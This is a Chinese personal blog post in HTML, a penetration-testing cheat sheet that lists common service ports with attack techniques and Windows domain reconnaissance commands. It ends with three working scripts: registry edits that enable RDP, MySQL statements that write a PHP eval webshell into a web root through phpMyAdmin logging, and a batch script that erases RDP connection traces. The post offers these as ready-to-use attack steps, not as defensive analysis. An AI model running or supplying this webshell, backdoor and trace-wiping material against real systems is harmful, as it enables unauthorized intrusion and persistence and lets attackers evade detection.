<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="实用技巧," />





  <link rel="alternate" href="/atom.xml" title="BoBo's Blog" type="application/atom+xml" />






<meta name="description" content="常见端口列表攻击方法总结方便以后查阅">
<meta name="keywords" content="实用技巧">
<meta property="og:type" content="article">
<meta property="og:title" content="常见端口列表攻击方法">
<meta property="og:url" content="http://bobosec.top/2019/07/18/port/index.html">
<meta property="og:site_name" content="BoBo&#39;s Blog">
<meta property="og:description" content="常见端口列表攻击方法总结方便以后查阅">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-07-18T03:47:28.417Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="常见端口列表攻击方法">
<meta name="twitter:description" content="常见端口列表攻击方法总结方便以后查阅">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://bobosec.top/2019/07/18/port/"/>





  <title>常见端口列表攻击方法 | BoBo's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">BoBo's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Day Day Up~</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://bobosec.top/2019/07/18/port/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="BoBo">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="BoBo's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">常见端口列表攻击方法</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-07-18T11:38:47+08:00">
                2019-07-18
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/渗透测试/" itemprop="url" rel="index">
                    <span itemprop="name">渗透测试</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          
              <div class="post-description">
                  常见端口列表攻击方法总结方便以后查阅
              </div>
          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="端口列表及攻击方法"><a href="#端口列表及攻击方法" class="headerlink" title="端口列表及攻击方法"></a>端口列表及攻击方法</h2><table>
<thead>
<tr>
<th style="text-align:left">端口号</th>
<th style="text-align:center">端口说明</th>
<th style="text-align:left">攻击技巧</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:left">21/22/69</td>
<td style="text-align:center">ftp/tftp：文件传输协议</td>
<td style="text-align:left">爆破\嗅探\溢出\后门</td>
</tr>
<tr>
<td style="text-align:left">22</td>
<td style="text-align:center">ssh：远程连接</td>
<td style="text-align:left">爆破OpenSSH；28个退格</td>
</tr>
<tr>
<td style="text-align:left">23</td>
<td style="text-align:center">telnet：远程连接</td>
<td style="text-align:left">爆破\嗅探</td>
</tr>
<tr>
<td style="text-align:left">25</td>
<td style="text-align:center">smtp：邮件服务</td>
<td style="text-align:left">邮件伪造</td>
</tr>
<tr>
<td style="text-align:left">53</td>
<td style="text-align:center">DNS：域名系统</td>
<td style="text-align:left">DNS区域传输\DNS劫持\DNS缓存投毒\DNS欺骗\利用DNS隧道技术刺透防火墙</td>
</tr>
<tr>
<td style="text-align:left">67/68</td>
<td style="text-align:center">dhcp</td>
<td style="text-align:left">劫持\欺骗</td>
</tr>
<tr>
<td style="text-align:left">110</td>
<td style="text-align:center">pop3</td>
<td style="text-align:left">爆破</td>
</tr>
<tr>
<td style="text-align:left">139</td>
<td style="text-align:center">samba</td>
<td style="text-align:left">爆破\未授权访问\远程代码执行</td>
</tr>
<tr>
<td style="text-align:left">143</td>
<td style="text-align:center">imap</td>
<td style="text-align:left">爆破</td>
</tr>
<tr>
<td style="text-align:left">161</td>
<td style="text-align:center">snmp</td>
<td style="text-align:left">爆破</td>
</tr>
<tr>
<td style="text-align:left">389</td>
<td style="text-align:center">ldap</td>
<td style="text-align:left">注入攻击\未授权访问</td>
</tr>
<tr>
<td style="text-align:left">512/513/514</td>
<td style="text-align:center">linux r</td>
<td style="text-align:left">直接使用rlogin</td>
</tr>
<tr>
<td style="text-align:left">873</td>
<td style="text-align:center">rsync</td>
<td style="text-align:left">未授权访问</td>
</tr>
<tr>
<td style="text-align:left">1080</td>
<td style="text-align:center">socket</td>
<td style="text-align:left">爆破：进行内网渗透</td>
</tr>
<tr>
<td style="text-align:left">1352</td>
<td style="text-align:center">lotus</td>
<td style="text-align:left">爆破：弱口令\信息泄漏：源代码</td>
</tr>
<tr>
<td style="text-align:left">1433</td>
<td style="text-align:center">mssql</td>
<td style="text-align:left">爆破：使用系统用户登录\注入攻击</td>
</tr>
<tr>
<td style="text-align:left">1521</td>
<td style="text-align:center">oracle</td>
<td style="text-align:left">爆破：TNS\注入攻击</td>
</tr>
<tr>
<td style="text-align:left">2049</td>
<td style="text-align:center">nfs</td>
<td style="text-align:left">配置不当</td>
</tr>
<tr>
<td style="text-align:left">2181</td>
<td style="text-align:center">zookeeper</td>
<td style="text-align:left">未授权访问</td>
</tr>
<tr>
<td style="text-align:left">3306</td>
<td style="text-align:center">mysql</td>
<td style="text-align:left">爆破\拒绝服务\注入</td>
</tr>
<tr>
<td style="text-align:left">3389</td>
<td style="text-align:center">rdp</td>
<td style="text-align:left">爆破\Shift后门</td>
</tr>
<tr>
<td style="text-align:left">4848</td>
<td style="text-align:center">glassfish</td>
<td style="text-align:left">爆破：控制台弱口令\认证绕过</td>
</tr>
<tr>
<td style="text-align:left">5000</td>
<td style="text-align:center">sybase/DB2</td>
<td style="text-align:left">爆破\注入</td>
</tr>
<tr>
<td style="text-align:left">5432</td>
<td style="text-align:center">postgresql</td>
<td style="text-align:left">缓冲区溢出\注入攻击\爆破：弱口令</td>
</tr>
<tr>
<td style="text-align:left">5632</td>
<td style="text-align:center">pcanywhere</td>
<td style="text-align:left">拒绝服务\代码执行</td>
</tr>
<tr>
<td style="text-align:left">5900</td>
<td style="text-align:center">vnc</td>
<td style="text-align:left">爆破：弱口令\认证绕过</td>
</tr>
<tr>
<td style="text-align:left">6379</td>
<td style="text-align:center">redis</td>
<td style="text-align:left">未授权访问\爆破：弱口令</td>
</tr>
<tr>
<td style="text-align:left">7001</td>
<td style="text-align:center">weblogic</td>
<td style="text-align:left">Java反序列化\控制台弱口令\控制台部署webshell</td>
</tr>
<tr>
<td style="text-align:left">80/443/8080</td>
<td style="text-align:center">web</td>
<td style="text-align:left">常见web攻击\控制台爆破\对应服务器版本漏洞</td>
</tr>
<tr>
<td style="text-align:left">8069</td>
<td style="text-align:center">zabbix</td>
<td style="text-align:left">远程命令执行</td>
</tr>
<tr>
<td style="text-align:left">9090</td>
<td style="text-align:center">websphere控制台</td>
<td style="text-align:left">爆破：控制台弱口令\Java反序列</td>
</tr>
<tr>
<td style="text-align:left">9200/9300</td>
<td style="text-align:center">elasticsearch</td>
<td style="text-align:left">远程代码执行</td>
</tr>
<tr>
<td style="text-align:left">11211</td>
<td style="text-align:center">memcacache</td>
<td style="text-align:left">未授权访问</td>
</tr>
<tr>
<td style="text-align:left">27017</td>
<td style="text-align:center">mongodb</td>
<td style="text-align:left">爆破\未授权访问</td>
</tr>
</tbody>
</table>
<h2 id="windows域渗透常见指令"><a href="#windows域渗透常见指令" class="headerlink" title="windows域渗透常见指令"></a>windows域渗透常见指令</h2><p>ipconfig /all 查看本机IP，所在域</p>
<p>net user /domain 查询域用户</p>
<p>net group /domain —— 查询域里面的工作组</p>
<p>net group “domain admins” /domain —— 查询域管理员用户组</p>
<p>ping D1.com 查看域控的IPnltest /dclist:d1 查看域控名字</p>
<p>net time /domain 查看时间，域控机器名</p>
<p>net view 显示域中的计算机名列表</p>
<p>net view /domain:D1 显示指定域中机器名</p>
<p>net user /domain 查看当前域中的用户</p>
<p>net group “domain admins” /domain 查询域管理员用户组</p>
<p>net config workstation 显示更改可配置工作站参数，也可以获得登录域，机器名等信息</p>
<p>net accounts查看本地密码策略</p>
<p>netstat –an/ano/anb网络连接查询</p>
<p>route print路由表</p>
<p>dsquery，可以用来收集跨域的信息，但是跨域执行的前提是必须建立信任关系</p>
<h2 id="脚本"><a href="#脚本" class="headerlink" title="脚本"></a>脚本</h2><h3 id="开启3389"><a href="#开启3389" class="headerlink" title="开启3389"></a>开启3389</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">REG ADD <span class="string">"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"</span> /v fDenyTSConnections /t REG_DWORD /d <span class="number">00000000</span> /f</span><br><span class="line">REG ADD <span class="string">"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"</span> /v PortNumber /t REG_DWORD /d <span class="number">0</span>x00000d3d /f</span><br></pre></td></tr></table></figure>
<h3 id="写shell"><a href="#写shell" class="headerlink" title="写shell"></a>写shell</h3><p>有apache phpmyadmin记下绝对路径<code>C:/phpStudy/PHPTutorial/WWW</code>。</p>
<p>尝试弱口令登入phpmyadmin然后日志写shell：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">show variables like <span class="string">'%general%'</span>;</span><br><span class="line">set global general_log = on;</span><br><span class="line">set global general_log_file = <span class="string">'C:/phpStudy/PHPTutorial/WWW/shell.php'</span>;</span><br><span class="line">select <span class="string">'&lt;?php eval($_POST['</span>a<span class="string">']);?&gt;'</span></span><br></pre></td></tr></table></figure>
<h3 id="清除3389痕迹脚本"><a href="#清除3389痕迹脚本" class="headerlink" title="清除3389痕迹脚本"></a>清除3389痕迹脚本</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">echo off</span><br><span class="line">color <span class="number">0</span>A</span><br><span class="line">title <span class="number">3389</span>连接痕迹清除</span><br><span class="line">mode con cols=<span class="number">88</span> lines=<span class="number">20</span></span><br><span class="line">set /p fk= 确定要清空<span class="number">3389</span>连接痕迹吗？(y/n)</span><br><span class="line"><span class="keyword">if</span> /i <span class="string">"%fk%"</span>==<span class="string">"y"</span> goto y</span><br><span class="line"><span class="keyword">if</span> /i <span class="string">"%fk%"</span>==<span class="string">"n"</span> goto n</span><br><span class="line">call %<span class="number">0</span></span><br><span class="line"></span><br><span class="line">:y</span><br><span class="line">reg delete <span class="string">"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client"</span> /f</span><br><span class="line">del /a /f /q %HOMEPATH%\Documents\Default.rdp</span><br><span class="line">echo 命令执行成功，请手动查看是否清除。</span><br><span class="line">pause &gt;nul</span><br><span class="line"></span><br><span class="line">:n</span><br><span class="line"><span class="keyword">exit</span></span><br></pre></td></tr></table></figure>

      
    </div>
    
    
    

    
    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>坚持原创技术分享，您的支持将鼓励我继续创作！</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>打赏</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechatreward.jpg" alt="BoBo 微信支付"/>
        <p>微信支付</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/images/alipayreward.jpg" alt="BoBo 支付宝"/>
        <p>支付宝</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    BoBo
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://bobosec.top/2019/07/18/port/" title="常见端口列表攻击方法">http://bobosec.top/2019/07/18/port/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="" rel="external nofollow" target="_blank"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a></a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/实用技巧/" rel="tag"># 实用技巧</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/03/16/python-start/" rel="next" title="Python山脚村的进阶之路">
                <i class="fa fa-chevron-left"></i> Python山脚村的进阶之路
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/08/07/qixi/" rel="prev" title="用聊天记录生成云图">
                用聊天记录生成云图 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
        <!-- JiaThis Button BEGIN -->
<div class="jiathis_style">
<span class="jiathis_txt">分享到：</span>
<a class="jiathis_button_fav">收藏夹</a>
<a class="jiathis_button_copy">复制网址</a>
<a class="jiathis_button_email">邮件</a>
<a class="jiathis_button_weixin">微信</a>
<a class="jiathis_button_qzone">QQ空间</a>
<a class="jiathis_button_tqq">腾讯微博</a>
<a class="jiathis_button_douban">豆瓣</a>
<a class="jiathis_button_share">一键分享</a>

<a href="http://www.jiathis.com/share?uid=2140465" class="jiathis jiathis_txt jiathis_separator jtico jtico_jiathis" target="_blank">更多</a>
<a class="jiathis_counter_style"></a>
</div>
<script type="text/javascript" >
var jiathis_config={
  data_track_clickback:true,
  summary:"",
  shortUrl:false,
  hideMore:false
}
</script>
<script type="text/javascript" src="http://v3.jiathis.com/code/jia.js?uid=" charset="utf-8"></script>
<!-- JiaThis Button END -->
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">BoBo</p>
              <p class="site-description motion-element" itemprop="description">小白努力中...</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">38</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">11</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#端口列表及攻击方法"><span class="nav-number">1.</span> <span class="nav-text">端口列表及攻击方法</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#windows域渗透常见指令"><span class="nav-number">2.</span> <span class="nav-text">windows域渗透常见指令</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#脚本"><span class="nav-number">3.</span> <span class="nav-text">脚本</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#开启3389"><span class="nav-number">3.1.</span> <span class="nav-text">开启3389</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#写shell"><span class="nav-number">3.2.</span> <span class="nav-text">写shell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#清除3389痕迹脚本"><span class="nav-number">3.3.</span> <span class="nav-text">清除3389痕迹脚本</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>
<div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">BoBo</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/clicklove.js"></script>